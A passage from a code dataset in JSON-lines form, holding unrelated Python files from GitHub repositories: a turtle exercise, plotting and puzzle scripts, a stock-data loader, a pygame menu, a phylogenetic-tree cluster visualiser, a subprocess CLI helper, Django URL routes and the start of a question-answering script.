没必要放到for循环里\n for i in range(n):\n t.fd(length)\n t.lt(angle)\n\n\nbob = turtle.Turtle()\nfor j in range(5):\n polygon(bob, float(input(\"Please input length:\")),\n int(input(\"Please input n-sided:\")))\nturtle.done()\n","repo_name":"Delayless/Think_Python","sub_path":"Chapter-4/4.3.3.py","file_name":"4.3.3.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"9244426016","text":"#!/usr/bin/env python3\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\ndef hypocycloid(b):\n\ttheta = np.arange(0, 2*np.pi, 0.001)\n\ta = float(b * 0.5 + 0.5)\n\t\n\tgc= colors[b]\n\tlabels = 'a = '+str(a)\n\tx = a * (np.cos(theta))**3\n\ty = a * (np.sin(theta))**3\n\tax.plot(x, y, color = gc, label = labels)\n\treturn\n\ncolors = ['purple', 'b', 'g', 'y', 'orange', 'r']\nax = plt.subplot(111)\nfor b in list(range(5)):\n\thypocycloid(b)\nax.set_title(\n\tr'Hypocycloid $x^{2/3}+y^{2/3}=a^{2/3}$')\nlegend = ax.legend(loc='lower left', shadow=True)\nframe = legend.get_frame()\nframe.set_facecolor('0.90')\nfor label in legend.get_texts():\n\tlabel.set_fontsize('large')\nfor label in legend.get_lines():\n\tlabel.set_linewidth(1.5)\nplt.show()\n","repo_name":"Jeffery-M-Thompson/computational_physics","sub_path":"01_08_hypocycloid.py","file_name":"01_08_hypocycloid.py","file_ext":"py","file_size_in_byte":717,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"1157680846","text":"#Write a program to find the sum and product of all elements of a list.\n\nn=int(input(\"enter the limit of the list : \"))\nlst=[]\nproduct=1\nfor i in range(0,n):\n x=int(input(\"enter the elements to list : \"))\n lst.append(x)\n product=product*x\n\nsum_lst=sum(lst)\n\n\nprint(\"the sum of list : %d \" %sum_lst)\nprint(\"the product of list : %d \" %product)\n","repo_name":"sreerajch657/internship","sub_path":"practise questions/product and sum list.py","file_name":"product and sum list.py","file_ext":"py","file_size_in_byte":352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"2145933040","text":"#!/usr/bin/env python3\n\nguest = [x for x in input()]\nhost = [x for x in input()]\nletters = [x for x in input()]\n\nsortedLetters = sorted(letters)\nsortedExpected = sorted(guest + host)\nif sortedLetters == sortedExpected:\n print(\"YES\")\nelse:\n print(\"NO\")\n","repo_name":"FlorentRevest/WCPS2017","sub_path":"amusing-joke.py","file_name":"amusing-joke.py","file_ext":"py","file_size_in_byte":258,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"26359779747","text":"import requests\nimport bs4 as bs\nimport yfinance as yf\nimport numpy as np\nimport glob\nimport pandas as pd\n\nclass StockUniverse:\n\n def __init__(self):\n self.start_date = '2000-01-03' # actual B.D. after the 1st January\n self.end_date = \"2023-03-03\"\n self.size_universe = 15\n self.path = r\"C:\\Users\\mager\\Desktop\\Master's Thesis\\Market_Data\"\n self.filename = self.path + '/sp500_historical_data.parquet'\n\n def get_sp500_history_data(self):\n \"\"\"\n Gets stock data for each stock in the SP from start date to end date.\n :return df:\n \"\"\"\n file = glob.glob(self.filename)\n if len(file) == 1: # Means data exists\n df = pd.read_parquet(file[0])\n else:\n # Requesting the composition of the SP\n resp = requests.get('http://en.wikipedia.org/wiki/List_of_S%26P_500_companies')\n soup = bs.BeautifulSoup(resp.text, 'lxml')\n table = soup.find('table', {'class': 'wikitable sortable'})\n\n # Building the tickers\n tickers = []\n\n for row in table.findAll('tr')[1:]:\n ticker = row.findAll('td')[0].text\n tickers.append(ticker)\n\n tickers = [s.replace('\\n', '') for s in tickers]\n data = yf.download(tickers, start=self.start_date, end=self.end_date) # Note for improvement; check in the\n # yf module if requests are done async\n\n df = data.stack().reset_index().rename(index=str, columns={\"level_1\": \"Symbol\"}).sort_values(['Symbol', 'Date'])\n df[\"market_cap\"] = df[\"Close\"] * df[\"Volume\"]\n return df\n\n def get_list_tickers(self, df):\n \"\"\"\n Gets the list of 15 stocks which have been present in the SP from start date to end date and have the highest\n market capitalization as of end date.\n :param df:\n :return tickers:\n \"\"\"\n first_date_df = df[df[\"Date\"] == self.start_date]\n ticker_list = first_date_df['Symbol'].tolist()\n # Get all tickers present throughout the whole period\n for date in df[\"Date\"].unique():\n date_df = df[df[\"Date\"] == date]\n date_ticker_list = date_df['Symbol'].tolist()\n ticker_list = list(set(ticker_list).intersection(date_ticker_list))\n last_date_df = df[df[\"Date\"] == self.end_date]\n last_date_df = last_date_df[last_date_df[\"Symbol\"].isin(ticker_list)].sort_values(by=\"market_cap\", ascending=False)[\"Symbol\"].head(self.size_universe)\n tickers = last_date_df.to_list()\n return tickers\n\n @staticmethod\n def get_summary_universe(df, tickers):\n \"\"\"\n Computes the min, max and mean log close prices & log vol for the selected stocks\n :param df:\n :param tickers:\n :return grouped:\n \"\"\"\n # filter the DataFrame to include only the symbols in symbol_list\n symbol_df = df[df['Symbol'].isin(tickers)]\n symbol_df[\"Log Close\"] = np.log(symbol_df[\"Close\"])\n symbol_df[\"Log Open\"] = np.log(symbol_df[\"Open\"])\n\n symbol_df[\"Daily RV\"] = abs(symbol_df[\"Log Close\"] - symbol_df[\"Log Open\"])\n\n # calculate the desired statistics by group\n grouped = symbol_df.groupby('Symbol').agg(\n {'Log Close': ['min', 'max', 'mean'], 'Daily RV': ['min', 'max', 'mean']}\n )\n\n print(grouped.head().to_string())\n # rename columns\n grouped.columns = ['Min log close price', 'Max log close price', 'Mean log close price',\n 'Min daily volatility', 'Max daily volatility', 'Mean daily volatility']\n\n # sort the DataFrame by market capitalization\n grouped = grouped.sort_values(by='Symbol', ascending=False)\n\n # reset the index to have a clean DataFrame with one row per symbol\n grouped = grouped.reset_index()\n return grouped\n\n def run(self):\n df_sp = self.get_sp500_history_data()\n tickers = self.get_list_tickers(df_sp)\n return tickers\n","repo_name":"albanmgd/Master_Thesis_203","sub_path":"4_Implementation/stock_universe.py","file_name":"stock_universe.py","file_ext":"py","file_size_in_byte":4033,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"33254427349","text":"import pygame\nfrom pygame.locals import *\nfrom Constants import *\nfrom DynamicTexts import *\n\nclass MainMenu(pygame.sprite.Sprite):\n \"\"\"\n The Main Menu!\n Returns: menu object\n Functions: tbd\n Attributes: image, rect, logo, startBtn, startBtn_rect, exitBtn, exitBtn_rect\n \"\"\"\n def __init__(self):\n #Call the parent class (Sprite) constructor\n pygame.init()\n pygame.sprite.Sprite.__init__(self)\n\n self.background = pygame.image.load('images/hardwoodFloor.jpg').convert()\n self.image=pygame.Surface(SCREEN_SIZE)\n self.rect=self.image.get_rect()\n \n self.font = pygame.font.Font('fonts/ARBUCKLE.TTF', 22)\n self.textControls1 = self.font.render(CONTROLS1, True, WHITE)\n self.textControls1_rect = self.textControls1.get_rect()\n self.textControls2 = self.font.render(CONTROLS2, True, WHITE)\n self.textControls2_rect = self.textControls2.get_rect()\n self.textControls1_shadow = self.font.render(CONTROLS1, True, BLACK)\n self.textControls1_shadow_rect = self.textControls1_shadow.get_rect()\n self.textControls2_shadow = self.font.render(CONTROLS2, True, BLACK)\n self.textControls2_shadow_rect = self.textControls2_shadow.get_rect()\n \n self.logo = pygame.image.load('images/menu/logo.png').convert_alpha()\n self.logo_rect = self.logo.get_rect()\n self.logo_rect.midtop = self.rect.midtop\n \n self.logo_anim=['images/menu/logo_01.png','images/menu/logo_02.png','images/menu/logo_03.png','images/menu/logo_04.png','images/menu/logo_05.png','images/menu/logo_06.png','images/menu/logo_07.png']\n \n self.textControls1_rect.midtop = self.logo_rect.midbottom\n self.textControls1_rect=self.textControls1_rect.move(0,-3)\n self.textControls2_rect.midtop = self.textControls1_rect.midbottom\n self.textControls2_rect=self.textControls2_rect.move(0,+5)\n self.textControls1_shadow_rect.midtop = self.textControls1_rect.midtop\n self.textControls2_shadow_rect.midtop = self.textControls2_rect.midtop\n self.textControls1_shadow_rect=self.textControls1_shadow_rect.move(-1,+1)\n self.textControls2_shadow_rect=self.textControls2_shadow_rect.move(-1,+1)\n \n \n self.startBtn = pygame.image.load('images/menu/startBtn.png').convert_alpha()\n self.startBtn_rect = self.startBtn.get_rect()\n self.exitBtn = pygame.image.load('images/menu/exitBtn.png').convert_alpha()\n self.exitBtn_rect = self.exitBtn.get_rect()\n self.startBtn_rect.midbottom = self.rect.midbottom\n self.startBtn_rect = self.startBtn_rect.move(-150,-10)\n self.exitBtn_rect.midbottom = self.rect.midbottom\n self.exitBtn_rect = self.exitBtn_rect.move(+150,-10)\n self.image.blit(self.background, self.rect)\n self.image.blit(self.textControls1_shadow, self.textControls1_shadow_rect)\n self.image.blit(self.textControls2_shadow, self.textControls2_shadow_rect)\n self.image.blit(self.textControls1, self.textControls1_rect)\n self.image.blit(self.textControls2, self.textControls2_rect)\n self.image.blit(self.logo, self.logo_rect)\n self.image.blit(self.startBtn, self.startBtn_rect)\n self.image.blit(self.exitBtn, self.exitBtn_rect)\n self.i=0\n \n def update(self):\n #print(self.i)\n self.logo=pygame.image.load(self.logo_anim[self.i]).convert_alpha()\n if (self.i<(len(self.logo_anim)-1)):self.i+=1\n else: self.i=0\n self.image.blit(self.background, self.rect)\n self.image.blit(self.textControls1_shadow, self.textControls1_shadow_rect)\n self.image.blit(self.textControls2_shadow, self.textControls2_shadow_rect)\n self.image.blit(self.textControls1, self.textControls1_rect)\n self.image.blit(self.textControls2, self.textControls2_rect)\n self.image.blit(self.logo, self.logo_rect)\n self.image.blit(self.startBtn, self.startBtn_rect)\n self.image.blit(self.exitBtn, self.exitBtn_rect)","repo_name":"word-dudely/Baby-Daddy","sub_path":"MainMenu.py","file_name":"MainMenu.py","file_ext":"py","file_size_in_byte":4063,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"18929364829","text":"#!/usr/bin/env python\n\nimport sys\nimport ete3\nimport optparse\nfrom ete3 import Tree, NodeStyle, AttrFace, faces, TreeStyle, SeqMotifFace\nimport random\n\nparser=optparse.OptionParser()\nparser.add_option('-i', '--infile', help='Treefile to visualize', type='str')\nparser.add_option('-l', '--leafnames', default= '',help='', type='str')\nparser.add_option('-t', '--nonbinary', action=\"store_true\", default=False)\nparser.add_option('-c', '--clusterIDs', default = 'deer/USA/OH-OSU', type = 'str')\nparser.add_option('-r', '--root', default= \"\", help='', type='str')\nparser.add_option('-f','--format',default = 0, help='default format is 0 format in ete3',type = 'int')\nparser.add_option('-o', '--outfile', help='path to final pdf', default = 'tree_colored.pdf', type='str')\nparser.add_option('-n', '--node', help='use internal nodes names as cluster ids', action=\"store_true\", default=False)\nparser.add_option('-e', '--onlyReroot', action=\"store_true\", default=False)\nparser.add_option('-u', '--clusteroutfile', default = '', type = 'str')\n\n##get options\noptions, args=parser.parse_args()\ntree = ete3.Tree(options.infile, format=options.format) #input tree is from treetime and nonbinary\nroot = options.root\noutfile = options.outfile\nnbchecker = options.nonbinary\nclnodeid = options.node\nonlyReroot=options.onlyReroot\nclusterIDs=options.clusterIDs\nclustersoutfile=options.clusteroutfile\n\n#cutoff is needed if tree is binary\ncutoff = 1e-05\n\nif not root == \"\":\n\ttree.set_outgroup(tree&root)\n\t\nif onlyReroot:\n\ttree.write(format=0, outfile=options.infile+\"_rerooted.nwk\")\n\texit()\n\t\n\ndef convert_to_nonbinary(t, threshold):\n\tfor node in t.iter_descendants(\"postorder\"):\n\t\t#print node.dist\n\t\tif node.dist < threshold:\n\t\t\tif not node.is_leaf():\n\t\t\t\tfor child in node.children:\n\t\t\t\t\t(node.up).add_child(child, dist = child.dist)\n\t\t\t\tnode.detach()\n\treturn(t)\n\nif not nbchecker: #check whether the input tree is nonbinary\n\ttree = convert_to_nonbinary(tree, cutoff)\n\t#tree.write(format=1, outfile=options.infile+\"_nonbinary.nwk\")\n\t\n####Go around the tree and find clusters of Ohio deers\n\nclusters = {}\nnum = 1\n\nfor node in tree.iter_descendants(\"postorder\"):\n\tif node.is_leaf():\n\t\tif clusterIDs in node.name:\n\t\t\tnode.add_feature('state',1)\n\t\telse:\n\t\t\tnode.add_feature('state',0)\n\telse:\n\t\tnode.state = 1\n\t\tohdeer = []\n\t\tnonohdeer = 0\n\t\tfor no in node.children:\n\t\t\tif no.state == 1:\n\t\t\t\tohdeer.append(no)\n\t\t\telse:\n\t\t\t\tnonohdeer +=1\n\t\tif nonohdeer > 0:\n\t\t\tnode.state = 0\n\t\t\tif len(ohdeer) > 0:\n\t\t\t\tfor child in ohdeer:\n\t\t\t\t\tif not child.is_leaf() and child.dist > cutoff: ### the child is a cluster founder if it is internal (has at least two terminal descendants) and russian\n\t\t\t\t\t\tif clnodeid:\n\t\t\t\t\t\t\tclusters[node.name] = child.get_leaf_names()\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tclusters[num] = child.get_leaf_names()\n\t\t\t\t\t\t\tnum +=1\n###\t\n#Print clusters and save to file\nclouf = ''\nif clustersoutfile == '':\n\tclouf = options.infile+\".clusters\"\nelse:\n\tclouf = clustersoutfile\nwith open(clouf, 'w') as outf:\n\tfor k in clusters:\n\t\t\t####print clusters\n\t\tfor elem in clusters[k]:\n\t\t\tprint (str(k)+\"\\t\"+elem.replace(\"\\'\",\"\"))\n\t\t\toutf.write(str(k)+\"\\t\"+elem.replace(\"\\'\",\"\")+\"\\n\")\n\t\n##Visualize\ndef layout(node):\n\tif node.is_leaf():\n\t\tif \"/deer/\" in node.name:\n\t\t\tdeerdesc = faces.AttrFace(\"name\", fsize=10)\n\t\t\tdeerdesc.margin_left = 25\n\t\t\tfaces.add_face_to_node(deerdesc, node, 0, aligned=False)\n\t\telse:\n\t\t\tif \"_\" in node.name:\n\t\t\t\tnode.name = node.name.replace(\"_\",\" \")\n\t\t\thumandesc = faces.AttrFace(\"name\", fsize=7)\n\t\t\thumandesc.margin_left = 5\n\t\t\thumandesc.margin_bottom = 1\n\t\t\thumandesc.margin_top = 1\n\t\t\thumandesc.margin_right = 5\n\t\t\tfaces.add_face_to_node(humandesc, node, 0, aligned = False)\n\nts = TreeStyle()\nts.branch_vertical_margin = 0.1\n#ts.root_opening_factor = 1\nts.arc_start = 180 # 0 degrees = 3 o'clock\nts.arc_span = 355\n#ts.mode = \"c\"\n#ts.scale = 2000000\nts.tree_width = 3000\nts.show_leaf_name = False\n#ts.draw_guiding_lines =True\n#ts.guiding_lines_type = 2\n#ts.show_branch_support = True\nts.layout_fn = layout\n\nwidthsingl = 10 #2\nwidthcluster = 10 #2\n\nsingletoncolor = \"#1b9e77\" #\"%06x\" % random.randint(0, 0xFFFFFF)\notherdeercolor = \"#d95f02\"\nohdeerStyle = NodeStyle()\nohdeerStyle['hz_line_color'] = singletoncolor\nohdeerStyle['vt_line_color'] = singletoncolor\nohdeerStyle['hz_line_width'] = widthsingl\nohdeerStyle['vt_line_width'] = widthsingl\nohdeerStyle[\"fgcolor\"] = \"black\"\nohdeerStyle[\"size\"] = 1\n\ndeerStyle = NodeStyle()\ndeerStyle['hz_line_color'] = otherdeercolor\ndeerStyle['vt_line_color'] = singletoncolor\ndeerStyle['hz_line_width'] = widthsingl\ndeerStyle['vt_line_width'] = widthsingl\nohdeerStyle[\"fgcolor\"] = \"black\"\nohdeerStyle[\"size\"] = 1\n\ngeneralStyle = NodeStyle()\ngeneralStyle[\"fgcolor\"] = \"black\"\ngeneralStyle[\"size\"] = 1\n\nfor leaves in tree:\n\tif \"/deer/\" in leaves.name:\n\t\tif clusterIDs in leaves.name:\n\t\t\tleaves.set_style(ohdeerStyle)\n\t\telse:\n\t\t\tleaves.set_style(deerStyle)\n\telse:\n\t\tleaves.set_style(generalStyle)\n\ncolorlist = [\"#8dd3c7\",\"#ffffb3\",\"#bebada\",\"#fb8072\",\"#80b1d3\",\"#fdb462\",\"#b3de69\",\"#fccde5\",\"#d9d9d9\",\"#bc80bd\",\"#ccebc5\",\"#ffed6f\",\"#7fc97f\",\"#beaed4\",\"#fdc086\",\"#ffff99\",\"#386cb0\",\"#f0027f\", \"#e08214\",\"#fdb863\",\"#fee0b6\",\"#f7f7f7\",\"#d8daeb\",\"#b2abd2\"]\n\nj=0\nfor clid in clusters:\n\t#set styles for clusters\n\tstylename = \"nsStyle\"+str(clid)\n\tleafstylename =\"lsStyle\"+str(clid)\n\texec(stylename+\"=NodeStyle()\")\n\ttransp = \"66\"\n\tcolor = colorlist[j]+ transp #Additional digits are for transparency\n\t#print(\"%i %s\" %(clid,color))\n\texec(stylename+\"['bgcolor'] = '\"+color+\"'\")\n\texec(stylename+\"['hz_line_color'] = 'black'\")\n\texec(stylename+\"['vt_line_color'] = 'black'\")\n\texec(stylename+\"['vt_line_width'] = \"+str(widthcluster))\n\texec(stylename+\"['hz_line_width'] = \"+str(widthcluster))\n\t\n\texec(leafstylename+\"=NodeStyle()\")\n\texec(leafstylename+\"['vt_line_width'] = \"+str(widthcluster))\n\texec(leafstylename+\"['hz_line_width'] = \"+str(widthcluster))\n\texec(leafstylename+\"['hz_line_color'] = 'black'\")\n\texec(leafstylename+\"['vt_line_color'] = 'black'\")\n\t\n\t###use it to set styles for clusters\n\tfor n in tree.get_common_ancestor(clusters[clid]).traverse():\n\t\texec(\"n.set_style(lsStyle\"+str(clid)+\")\")\n\tcommonnode = tree.get_common_ancestor(clusters[clid])\n\texec(\"commonnode.set_style(nsStyle\"+str(clid)+\")\")\n\tj+=1\n\n\n\n\n\n#tree.show(tree_style=ts)\n\ntree.render(outfile, w = 1200, units= 'px', dpi = 350, tree_style = ts)\n","repo_name":"garushyants/sars_cov_2_deer_Ohio","sub_path":"scripts/vizualize_tree.py","file_name":"vizualize_tree.py","file_ext":"py","file_size_in_byte":6325,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"1270176713","text":"from btconfig.configutils import AttrDict\nfrom btecli.lib.logger import Logger\nfrom btecli.lib.shell.which import which\nimport os\nimport re\nimport sys\nfrom subprocess import Popen, PIPE, STDOUT, call, run\nimport threading\nimport time\n\n# Import third-party and custom modules\ntry:\n from btecli.lib.shell import shell_map\n import colorama\nexcept ImportError as e:\n print('Error in %s ' % os.path.basename(__file__))\n print('Failed to import at least one required module')\n print('Error was %s' % e)\n print('Please install/update the required modules:')\n print('pip install -U -r requirements.txt')\n sys.exit(1)\n\ncolorama.init(convert=True, autoreset=True) # Needed for Windows, supposedly ignored by linux\n\n# Setup Logging\nlogger = Logger().init_logger(__name__)\n\nclass CliInvocation:\n\n def __init__(self):\n\n self.proc = None\n self.done = False\n self.invocation = type('obj', (object,), {\n 'stdout': None,\n 'failed': False,\n 'returncode': 0\n }\n ) \n self.logger = logger\n\n def call(self, **kwargs):\n \n cmd = [kwargs['cmd_spec']]\n cmd_args = kwargs.get('cmd_args', [])\n ext = kwargs['cmd_ext']\n cmd_invocation = kwargs.get('invocation')\n cmd_is_interactive = kwargs.get('interactive')\n debug_enabled = kwargs.get('debug_enabled', False)\n suppress_output = kwargs.get('suppress_output', False)\n exe = shell_map[ext]['invocation'][cmd_invocation]['executable']\n \n # Adjust shell environment\n curr_env = os.environ.copy()\n env_variables = kwargs['env_variables']\n modified_env = AttrDict.merge(curr_env, env_variables)\n\n if exe is None:\n self.logger.error(\"Specified executable is invalid, got '%s'\" % exe)\n sys.exit(1) \n executable = which(exe)\n if not executable:\n self.logger.error('No executable found for %s' % exe)\n sys.exit(1)\n if debug_enabled:\n process_invocation = [executable] + shell_map[ext]['invocation'][cmd_invocation]['flags_w_debug'] + cmd + cmd_args\n else:\n process_invocation = [executable] + shell_map[ext]['invocation'][cmd_invocation]['flags'] + cmd + cmd_args\n self.logger.debug('Process Invocation: %s' % process_invocation)\n if cmd_is_interactive:\n call(process_invocation, shell=True, env=modified_env)\n sys.exit()\n else:\n def thread_target():\n try:\n if sys.version_info[0] >= 3:\n with Popen(process_invocation, \n stdout=PIPE, \n stderr=STDOUT, \n bufsize=1, \n universal_newlines=True, \n env=modified_env\n ) as self.proc:\n if not suppress_output:\n for line in self.proc.stdout:\n sys.stdout.write(line) # process line here\n if self.proc.returncode != 0:\n self.invocation.failed = True\n self.invocation.returncode = p.returncode\n self.invocation.stdout = 'Encountered error code {errcode} in the specified command {args}'.format(\n errcode=p.returncode, args=p.args)\n self.done = True\n self.done = True\n self.invocation.returncode = self.proc.returncode\n else:\n # Invoke process\n self.proc = Popen(\n process_invocation,\n stdout=PIPE,\n stderr=STDOUT)\n # Poll for new output until finished\n while True:\n nextline = self.proc.stdout.readline()\n if nextline == '' and self.proc.poll() is not None:\n break\n if not suppress_output: \n sys.stdout.write(nextline)\n sys.stdout.flush()\n self.done = True\n self.invocation.returncode = self.proc.returncode\n except Exception:\n self.done = True\n\n try:\n if sys.version_info[0] >= 3:\n t = threading.Thread(target=thread_target, daemon=True)\n else:\n t = threading.Thread(target=thread_target)\n t.start()\n except Exception:\n pass\n try:\n while not self.done:\n time.sleep(0.1)\n return self.invocation\n\n except KeyboardInterrupt:\n print(\"KeyboardInterrupt\")\n try:\n self.proc.terminate()\n except Exception:\n pass","repo_name":"berttejeda/bert.ecli","sub_path":"btecli/lib/proc/local_invocation.py","file_name":"local_invocation.py","file_ext":"py","file_size_in_byte":5064,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"13908646682","text":"\"\"\"onlinecourseappblue_24214 URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.2/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf import settings\nfrom django.conf.urls.static import static\nfrom django.conf.urls import url\nfrom django.contrib import admin\nfrom django.urls import path, include\nfrom allauth.account.views import confirm_email\nfrom rest_framework import permissions\nfrom drf_yasg.views import get_schema_view\nfrom drf_yasg import openapi\n\nfrom users.api.viewsets import UserVerificationAPIView\nfrom users.views import register_by_access_token, UserRegister, AppleLogin\n\nurlpatterns = [\n path(\"\", include(\"home.urls\")),\n path(\"accounts/\", include(\"allauth.urls\")),\n path(\"api/v1/\", include(\"home.api.v1.urls\")),\n path(\"api/v1/\", include(\"course.api.v1.urls\")),\n path(\"admin/\", admin.site.urls),\n path(\"users/\", include(\"users.urls\", namespace=\"users\")),\n path(\"rest-auth/\", include(\"rest_auth.urls\")),\n # Override email confirm to use allauth's HTML view instead of rest_auth's API view\n path(\"rest-auth/registration/account-confirm-email//\", confirm_email),\n path(\"rest-auth/registration/\", include(\"rest_auth.registration.urls\")),\n path(\"rest-auth/register/\", UserRegister.as_view()),\n path(\"rest-auth/user-verification/\", UserVerificationAPIView.as_view()),\n path(\"api/v1/\", include(\"course.api.v1.urls\")),\n path(\"api/v1/\", include(\"notifications.api.v1.urls\")),\n path(\"home/\", include(\"home.urls\")),\n path(\"course/\", include(\"course.urls\")),\n url('^register-by-token/apple/$', AppleLogin.as_view({'post': 'create'})),\n url('^register-by-token/(?P[^/]+)/$', register_by_access_token),\n path('auth/', include('social_django.urls', namespace='social')),\n path('grappelli/', include('grappelli.urls')),\n path(\"stripe/\", include(\"djstripe.urls\", namespace=\"djstripe\")),\n path(\"payments/\", include('payments.urls'))\n]\n\nadmin.site.site_header = \"OnlineCourseAppBP\"\nadmin.site.site_title = \"OnlineCourseAppBP Admin Portal\"\nadmin.site.index_title = \"OnlineCourseAppBP Admin\"\n\n# swagger\nschema_view = get_schema_view(\n openapi.Info(\n title=\"OnlineCourseAppBlueprint API\",\n default_version=\"v1\",\n description=\"API documentation for OnlineCourseAppBlueprint App\",\n ),\n public=True,\n permission_classes=(permissions.IsAuthenticated,),\n)\n\nurlpatterns += [\n path(\"api-docs/\", schema_view.with_ui(\"swagger\", cache_timeout=0), name=\"api_docs\")\n]\n\nurlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n\nif settings.DEBUG:\n urlpatterns += [url(r'^silk/', include('silk.urls', namespace='silk'))]\n","repo_name":"crowdbotics-apps/onlinecourseappblue-24214","sub_path":"backend/onlinecourseappblue_24214/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":3176,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"4220181208","text":"\"\"\"\r\nGiven an array of n integers : A1,A2,...,An, find the longest size subsequence which satisfies the following property:\r\nThe xor of adjacent integers in the subsequence must be non-decreasing.\r\n\r\nTiming:1sec\r\nlevel:5\r\n\r\nInput Description:\r\nFirst line contains an integer n, denoting the length of the array.\r\nSecond line will contain n space separated integers, denoting the elements of the array.\r\n\r\nOutput Description:\r\nOutput a single integer denoting the longest size of subsequence with the given property.\r\n\r\nConstraints\r\n 1≤n≤103\r\n 0≤Ai≤1018\r\n\r\nInput:\r\n8\r\n1 200 3 0 400 4 1 7\r\n\r\nOutput:\r\n6\r\n\r\nEXPLANATION:\r\nThe subsequence of maximum length is {1, 3, 0, 4, 1, 7} with Xor of adjacent indexes as {2,3,4,5,6} (non-decreasing)\r\n\r\nInput:\r\n4\r\n1 20 4 45\r\nOutput:\r\n\r\nInput:\r\n7\r\n45 1 87 2 54 2 1\r\nOutput:\r\n\r\nInput:\r\n9\r\n1 22 4 0 45 2 0 2 3 7\r\nOutput:\r\n\r\nInput:\r\n3\r\n1 10 2\r\nOutput:\r\n\r\nSolution:\r\n\"\"\"\r\nn=int(input())\r\nl=list(map(int,input().split()))\r\na=[]\r\nfor i in range(0,n):\r\n\tfor j in range(i+1,n):\r\n\t\ta.append((l[i]^l[j],(i,j)))\r\n\r\na.sort()\r\ndp=[0]*n\r\nfor i in range(0,len(a)):\r\n\tx=a[i][0]\r\n\tleft,right=a[i][1][0],a[i][1][1]\r\n\tdp[right]=max(dp[left]+1,dp[right])\r\n\r\nprint(max(dp)+1)\r\n","repo_name":"GuhanSGCIT/Trees-and-Graphs-problem","sub_path":"longest size subsequence.py","file_name":"longest size subsequence.py","file_ext":"py","file_size_in_byte":1204,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"71353841809","text":"\"\"\"\r\nIsaiah Banta\r\nbantaib@whitman.edu\r\n\r\nA simple implementation of a Whitman focused Factoid Question \r\nAnswering program.\r\n\"\"\"\r\n\r\nimport string\r\nimport stanfordnlp as snlp\r\nimport nltk\r\nfrom nltk.corpus import stopwords\r\nfrom nltk.tokenize import word_tokenize\r\nfrom nltk.stem import WordNetLemmatizer\r\nimport spacy\r\nfrom spacy import displacy\r\nfrom collections import Counter\r\nimport en_core_web_sm\r\n\r\n\r\n# POS tagger declared here as it has a print statement that can't be stopped\r\nnlp_pos = snlp.Pipeline(processors='tokenize,mwt,pos')\r\n\r\n# named entity recognition loaded here\r\nnlp_entity_recog = spacy.load(\"en_core_web_sm\")\r\n\r\n# list of stop words provided by nltk\r\nstop_words = set(stopwords.words('english'))\r\n\r\n# list of wh- words\r\nquestion_signifiers = ['who', 'what', 'when', 'where', 'why', 'how', 'whose']\r\n\r\n# list of question classifications in a hierarchy\r\ndatabase = {'PERSON': [],\r\n 'NORP': [],\r\n 'FAC': [],\r\n 'ORG': [],\r\n 'GPE': [],\r\n 'LOC': [],\r\n 'PRODUCT': [],\r\n 'EVENT': [],\r\n 'WORK_OF_ART': [],\r\n 'LAW': [],\r\n 'LANGUAGE': [],\r\n 'DATE': [],\r\n 'TIME': [],\r\n 'PERCENT': [],\r\n 'MONEY': [],\r\n 'QUANTITY': [],\r\n 'ORDINAL': [],\r\n 'CARDINAL': [],\r\n 'OTHER': []}\r\n\r\n\r\ndef find_key_words(question):\r\n \"\"\"\r\n Returns a list strings of key words in the param question\r\n \"\"\"\r\n\r\n # initiate word lemmatizer\r\n WNL = WordNetLemmatizer()\r\n\r\n # remove punctuation, lower caps, and tokenize\r\n question = question.translate(str.maketrans('', '', string.punctuation)).lower()\r\n \r\n # apply pos and tokenization\r\n doc = nlp_pos(question)\r\n\r\n # filter based on noun phrases and stop words\r\n key_words = []\r\n for sent in doc.sentences:\r\n for word in sent.words:\r\n if word.xpos == 'NNP':\r\n key_words.append(word.text)\r\n continue\r\n if word.text not in stop_words:\r\n key_words.append(word.text)\r\n if word.text != WNL.lemmatize(word.text):\r\n key_words.append(word.text)\r\n\r\n return key_words\r\n\r\n\r\ndef question_classification(question):\r\n \"\"\"\r\n Returns the answer type of the question as a list of strings\r\n I checked the course syllabus to make sure this was allowed:\r\n I built upon github.com/timotito/NLP-Question-Answer-System 's implementation\r\n of their question classification code in their processquestion() function.\r\n \"\"\"\r\n \r\n question = question.lower()\r\n qtokens = word_tokenize(question)\r\n\r\n question_signifier = \"\"\r\n qindx = -1\r\n\r\n answer_type = \"\"\r\n\r\n for (indx, word) in enumerate(qtokens):\r\n if word in question_signifiers:\r\n question_signifier = word\r\n qindx = indx\r\n break\r\n\r\n # if no question signifiers found\r\n if qindx < 0:\r\n return 'OTHER'\r\n \r\n # if multiple question signifiers found\r\n if qindx > len(qtokens) - 3:\r\n rest = qtokens[:qindx]\r\n else:\r\n rest = qtokens[qindx+1:]\r\n \r\n answer_type = 'OTHER'\r\n \r\n # if just one then match subsets of question_signifiers list\r\n if question_signifier in ['who', 